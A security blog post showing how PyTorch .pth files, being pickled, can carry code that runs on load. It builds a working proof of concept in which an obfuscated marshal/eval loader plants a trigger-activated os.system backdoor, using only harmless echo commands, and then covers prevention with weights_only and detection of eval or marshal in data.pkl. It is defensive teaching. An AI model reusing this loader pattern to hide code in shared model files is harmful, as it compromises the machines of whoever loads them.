A PoC to make a backdoored PyTorch model
We see how malicious people can backdoor pth files, and how to prevent and detect it.
Introduction
For the first article of my blog, I will talk about backdoor in PyTorch model. PyTorch is a famous library that is used to create neural networks. As you might know, neural networks are functions that takes an input and returns an output, to solve a given problem (classify images, to generate a message such as in ChatGPT), etc. In particular, a given trained neural network - also called a model - can be saved into a file using a save function, and can be used later with a load function. For example, Hugging face is a website that gives the possibility for users to download and/or submit models. However, at the end, neural networks are code, and thus can contain malicious instructions such as a backdoor. In this article, we see:
-
How to insert a backdoor inside a pth file (i.e. a saved PyTorch model).
-
How to detect such a malicious pth file.
Now, let’s get started :)
Pickle
Pytorch’s model serializations are based on pickle from Python. Working on this POC was an occasion for me to be a little bit more familiar with this module. Pickle is a way to serialize python code into a file, and load it later. Example:
import pickle
class classA:
def __init__(self, a):
self.a = a
def show(self):
print(f"You stored {self.a}")
A = classA(1337)
# Pickle the object A (saving it into a file data.pkl).
f = open('data.pkl', 'wb')
pickle.dump(A, f)
f.close()
# Unpickle it
f = open('data.pkl', 'rb')
A = pickle.load(f)
A.show()The code above stores a class instance inside a file called data.pkl, and is retrieved later. Executing it gives us the expected output:
You stored 1337Perfect. Now, what if we create another python file, and try to load the pickle data in it? Let’s try:
# -- In a different file --
import pickle
f = open('data.pkl', 'rb')
A = pickle.load(f) # ErrorExecuting it give us:
AttributeError: Can't get attribute 'classA' on <module '__main__'.This was a bit surprising for me because I thought the class was completely contained in my serialized file data.pkl. But actually, pickle does not serialize all the code, but rather a reference to the class. In other words, to make the code to work, we have to define classA inside the new file.
So good so far, but why pickle unserializations are dangerous then? Well actually, we can still execute arbitrary code during pickle’s loading. This is because pickle use the method __reduce__ to know how to unpickle a file. In particular, one can put malicious code inside this method:
import pickle
import os
class classA:
def __init__(self, a):
self.a = a
def __reduce__(self):
os.system('echo system inside the __reduce__ function.')
return (os.system, ('echo malicious command',))
def show(self):
print(f"You stored {self.a}")
A = classA(1337)
# Pickle the object A (saving it into a file data.pkl).
print("Saving")
f = open('data.pkl', 'wb')
pickle.dump(A, f)
f.close()
# Unpickle it
print("Loading")
f = open('data.pkl', 'rb')
A = pickle.load(f) # Print malicious command
A.show() # ErrorThis gives the output
Saving
system inside the __reduce__ function.
Loading
malicious command
Traceback (most recent call last):
File "/hacktelligence/test2.py", line 29, in <module>
A.show() # Error
^^^^^^
AttributeError: 'int' object has no attribute 'show'We considered the same code than before, except that we add a __reduce__ method to the class. The method returns a tuple where its first element is the function/class we want to instantiate, and the second element is a tuple giving the parameters to instantiate the function/class. Here, we ask to pickle.load to instantiate the function os.system with the parameter echo malicious command. Thus, when we call pickle.load, the malicious command is executed. We also notice that the code inside the __reduce__ function is executed only during saving! Also the output of os.system('echo malicious command') (which is the int 0) is returned to the variable A. That is why we get an error when we call A.show().
Also, an important thing to notice is that if you run the pickle.load command inside another file, it works! The malicious command is executed. The reason why it executes sucessfully is because we use a simple function such as os.system which is well defined in Python. In general we can do it with any built-in functions, but if we try to insert our own class or function in the following way:
return (classA, (5,))and load it in another file where classA is not defined, you will get again the error:
AttributeError: Can't get attribute 'classA' on <module '__main__'.Pytorch (de)serialization (pth format)
To make this article, I used Python 3.13.5 and PyTorch 2.8.0+cu128. But the concepts should not be different across the different versions. Here is a minimal code to save and load a model with PyTorch:
import torch
import torch.nn as nn
class CustomizedLayer(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return x + 1
# Create a neural network.
model = nn.Sequential(*[
CustomizedLayer(),
nn.Linear(8, 16),
nn.ReLU(),
nn.Linear(16, 1),
nn.ReLU()
])
# Use our neural network on an input
x = torch.randn(8)
print("Result of the nn:", model(x))
# Save it
torch.save(model, 'model.pth')
# Load it
model = torch.load('model.pth', weights_only=False)
# Execute it again.
print("Result of the nn:", model(x))The output is:
Result of the nn: tensor([0.0249], grad_fn=<ReluBackward0>)
Result of the nn: tensor([0.0249], grad_fn=<ReluBackward0>)This creates a pth file which is actually an archive that we can unzip:
$ unzip model.pth
Archive: model.pth
extracting: model/data.pkl
extracting: model/.format_version
extracting: model/.storage_alignment
extracting: model/byteorder
extracting: model/data/0
extracting: model/data/1
extracting: model/data/2
extracting: model/data/3
extracting: model/version
extracting: model/.data/serialization_id The file model/data.pkl contains the reference to the different layers of our neural network, and model/data/* contains the weights and biaises. In particular, we can see at the file extension that the data.pkl is created using pickle. So it means (as specified in PyTorch documentation) that when we load a PyTorch model, we unpickle a file. It also means that there is a risk to execute malicious code! :(
Backdoor PoC
From the previous discussion, it is clear that pth file can contain malicious instructions, I give here a simple PoC to do that:
import torch
import torch.nn as nn
import os
class CustomizedLayer(nn.Module):
def __init__(self):
super().__init__()
def __reduce__(self):
return (os.system, ('echo malicious command',))
def forward(self, x):
return x + 1
# Create a neural network.
model = nn.Sequential(*[
CustomizedLayer(),
nn.Linear(8, 16),
nn.ReLU(),
nn.Linear(16, 1),
nn.ReLU()
])
# Use our neural network on an input
x = torch.randn(8)
print("Result of the nn:", model(x))
# Save it
torch.save(model, 'model.pth')
# Load it
model = torch.load('model.pth', weights_only=False)
# Execute it again.
print("Result of the nn:", model(x))Basically, we take the code from before and add the method __reduce__ to the malicious layer. Its execution gives the following output:
Result of the nn: tensor([0.7658], grad_fn=<ReluBackward0>)
malicious command
TypeError: 'int' object is not callableThe malicious command is executed, perfect! But there is an error. Actually this is the same we have seen in the pickle section. Pickle look at __reduce__ to reconstruct the class CustomizedLayer, but we execute the command os.system('echo malicious command') and instead of returning a CustomizedLayer Object, we return an int.
So basically, people that load the model will execute the malicious code, but they load an unusable model which is actually an integer. Not very subtle for a backdoor. The goal of the next PoC is to show that a malicious person can actually create a usable model that contains a backdoor.
import torch
import torch.nn as nn
import marshal
class Wrapper(nn.Module):
def __init__(self):
super().__init__()
def __reduce__(self):
src = "def _payload():\n class CustomizedLayer(torch.nn.Module):\n def __init__(self):\n super().__init__()\n def forward(self, x):\n if(torch.equal(x, torch.zeros(8))):\n os.system('echo Activate backdoor.')\n return x\n\n return CustomizedLayer()\n"
compiled = compile(src, "<string>", "exec")
bytecodes = marshal.dumps(compiled.co_consts[0])
expr = (
"__import__('types').FunctionType("
"__import__('marshal').loads(" + repr(bytecodes) + "), "
"{'os': __import__('os'), '__builtins__': __import__('builtins'), "
"'torch': __import__('torch')}"
")()"
)
return (eval, (expr,))
def forward(self, x):
return x
# Create malicious neural network
model = nn.Sequential(*[
Wrapper(),
nn.Linear(8, 16),
nn.ReLU(),
nn.Linear(16, 1),
nn.ReLU()
])
x = torch.randn(8)
print(model(x).shape)
torch.save(model, 'model.pth')
test = torch.load('model.pth', weights_only=False)
print(test(x))
# Activate backdoor.
print(test(torch.zeros(8)))Let’s analyze the code above. In a nutshell, we create a fake neural network layer called Wrapper in our model such that when it is loaded by torch.load, it creates a true neural network layer called CustomizedLayer that contains the backdoor. The payload variable is equal to the following:
def _payload():
class CustomizedLayer(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
if(torch.equal(x, torch.zeros(8))):
os.system('echo Activate backdoor.')
return x
return CustomizedLayer()It works like a classical neural network layer, except that when the input of the neural network is zero then it activates the backdoor. We compile this payload to obtain python bytecode that we evaluate then by using the variable expr. This last part uses a rather obscure function called FunctionType. You can read more about it on https://stackoverflow.com/questions/10303248/true-dynamic-and-anonymous-functions-possible-in-python. Basically, evaluating expr consists in doing:
import types
import marshal
loaded_bytecodes = marshal.loads(repr(bytecodes))
globals = {'os': __import__('os'), '__builtins__': __import__('builtins'), 'torch': __import__('torch')}
FunctionType(loaded_bytecodes, globals)In other words, it creates a dynamic function with the payload bytecodes, using the given globals that ensures that the packages are imported.
The output of the complete PoC is:
torch.Size([1])
tensor([0.2968], grad_fn=<ReluBackward0>)
Activate backdoor.
tensor([0.2461], grad_fn=<ReluBackward0>)However, the PoC uses Python bytecodes with Marshal, which might cause compatibility issues with a different version of Python. To be honest, I did not find a way to do it without bytecodes, so if you have any insights, don’t hesitate to contact me! I tried on Python 3.13.3, it worked like a charm. However on Python 3.10.5 I got
ValueError: bad marshal data (unknown type code)Protection and Detection
Now the questions are
-
How to avoid installing a backdoor when doing machine learning?
-
How to detect a malicious pth file?
For the first question, I would naively say to never install a non-trusted model from a weird source, but this might be not satisfying as an answer. In PyTorch, there is a security which is supposed to prevent the execution of arbitrary code when loading a model. This security is activated by default and consists in putting the parameter weights_only to True. Indeed, if we try to load the backdoored model above, we get this error
_pickle.UnpicklingError: Weights only load failed. This file can still be loaded, to do so you have two options, do those steps only if you trust the source of the checkpoint.
(1) In PyTorch 2.6, we changed the default value of the `weights_only` argument in `torch.load` from `False` to `True`. Re-running `torch.load` with `weights_only` set to `False` will likely succeed, but it can result in arbitrary code execution. Do it only if you got the file from a trusted source.
(2) Alternatively, to load with `weights_only=True` please check the recommended steps in the following error message.
WeightsUnpickler error: Unsupported global: GLOBAL torch.nn.modules.container.Sequential was not an allowed global by default. Please use `torch.serialization.add_safe_globals([torch.nn.modules.container.Sequential])` or the `torch.serialization.safe_globals([torch.nn.modules.container.Sequential])` context manager to allowlist this global if you trust this class/function.
Check the documentation of torch.load to learn more about types accepted by default with weights_only https://pytorch.org/docs/stable/generated/torch.load.html.As we try to load a model, it might be tempting to just add weights_only=False to the torch.load function to fix this error, without giving a second thought. From what we discuss in this article, we now know what are the risks when we do so.
If we follow those two rules, it should be enough to prevent most of the attacks. However, we are never too careful, especially when a recent exploit allows to bypass weights_only=True in version of PyTorch < 2.6: https://nvd.nist.gov/vuln/detail/CVE-2025-32434
For the detection, on my current PoC it is rather easy. You can just unzip the pth file, do
$ strings data.pkl
[...]
eval
__import__('types').FunctionType(__import__('marshal').loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00\xf3V\x00\x00\x00\x95\x00\x18\x00"\x00S\x01\x1a\x00S\x02[\x00\x00\x00\x00\x00\x00\x00\x00\x00R\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00R\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x005\x03\x00\x00\x00\x00\x00\x00n\x00U\x00"\x005\x00\x00\x00\x00\x00\x00\x00$\x00)\x03Nc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xf3.\x00\x00\x00^\x00\x95\x00\\\x00r\x01S\x00r\x02S\x01r\x03U\x004\x01S\x02\x1a\x00j\x08r\x04S\x03\x1a\x00r\x05S\x04r\x06U\x00=\x01r\x07$\x00)\x05\xda!_payload.<locals>.CustomizedLayer\xe9\x02\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x13\x00\x00\x00\xf3"\x00\x00\x00>\x01\x95\x00[\x00\x00\x00\x00\x00\x00\x00\x00\x00T\x01U\x00]\x05\x00\x005\x00\x00\x00\x00\x00\x00\x00 \x00g\x00)\x01N)\x02\xda\x05super\xda\x08__init__)\x02\xda\x04self\xda\t__class__s\x02\x00\x00\x00 \x80\xda\x08<string>r\x07\x00\x00\x00\xda*_payload.<locals>.CustomizedLayer.__init__\x03\x00\x00\x00s\x0e\x00\x00\x00\xf8\x80\x00\xdc\x0c\x11\x89G\xd1\x0c\x1c\xd5\x0c\x1e\xf3\x00\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x13\x00\x00\x00\xf3\x8c\x00\x00\x00\x95\x00[\x00\x00\x00\x00\x00\x00\x00\x00\x00R\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00U\x01[\x00\x00\x00\x00\x00\x00\x00\x00\x00R\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x015\x01\x00\x00\x00\x00\x00\x005\x02\x00\x00\x00\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00a\x15\x00\x00[\x06\x00\x00\x00\x00\x00\x00\x00\x00R\t\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x025\x01\x00\x00\x00\x00\x00\x00 \x00U\x01$\x00)\x03N\xe9\x08\x00\x00\x00z\x17echo Activate backdoor.)\x05\xda\x05torch\xda\x05equal\xda\x05zeros\xda\x02os\xda\x06system)\x02r\x08\x00\x00\x00\xda\x01xs\x02\x00\x00\x00 r\n\x00\x00\x00\xda\x07forward\xda)_payload.<locals>.CustomizedLayer.forward\x05\x00\x00\x00s-\x00\x00\x00\x80\x00\xdc\x0f\x14\x8f{\x89{\x981\x9ce\x9fk\x99k\xa8!\x9bn\xd7\x0f-\xd1\x0f-\xdc\x10\x12\x97\t\x91\t\xd0\x1a3\xd4\x104\xd8\x13\x14\x88Hr\x0c\x00\x00\x00\xa9\x00)\x08\xda\x08__name__\xda\n__module__\xda\x0c__qualname__\xda\x0f__firstlineno__r\x07\x00\x00\x00r\x15\x00\x00\x00\xda\x15__static_attributes__\xda\r__classcell__)\x01r\t\x00\x00\x00s\x01\x00\x00\x00@r\n\x00\x00\x00\xda\x0fCustomizedLayerr\x03\x00\x00\x00\x02\x00\x00\x00s\x12\x00\x00\x00\xf8\x86\x00\xf5\x02\x01\t\x1f\xf7\x04\x03\t\x15\xf0\x00\x03\t\x15r\x0c\x00\x00\x00r\x1e\x00\x00\x00)\x03r\x0f\x00\x00\x00\xda\x02nn\xda\x06Module)\x01r\x1e\x00\x00\x00s\x01\x00\x00\x00 r\n\x00\x00\x00\xda\x08_payloadr!\x00\x00\x00\x01\x00\x00\x00s!\x00\x00\x00\x80\x00\xf4\x02\x06\x05\x15\x9c%\x9f(\x99(\x9f/\x99/\xf4\x00\x06\x05\x15\xf1\x10\x00\x0c\x1b\xd3\x0b\x1c\xd0\x04\x1cr\x0c\x00\x00\x00'), {'os': __import__('os'), '__builtins__': __import__('builtins'), 'torch': __import__('torch')})()q)
[...]Detecting the use of eval or marshal inside the data.pkl is sufficiently suspicious to classify the model as malicious. It would be very interesting to go more in details into this direction in another article. You can see https://www.rapid7.com/blog/post/from-pth-to-p0wned-abuse-of-pickle-files-in-ai-model-supply-chains/ for more information about this. Also, the Fickling might be also interesting to analyze pickle file: https://github.com/trailofbits/fickling.
Conclusion
In conclusion, never load an unknown model. Except if you want to lose the control of your machine :)
exit()
Hacktelligence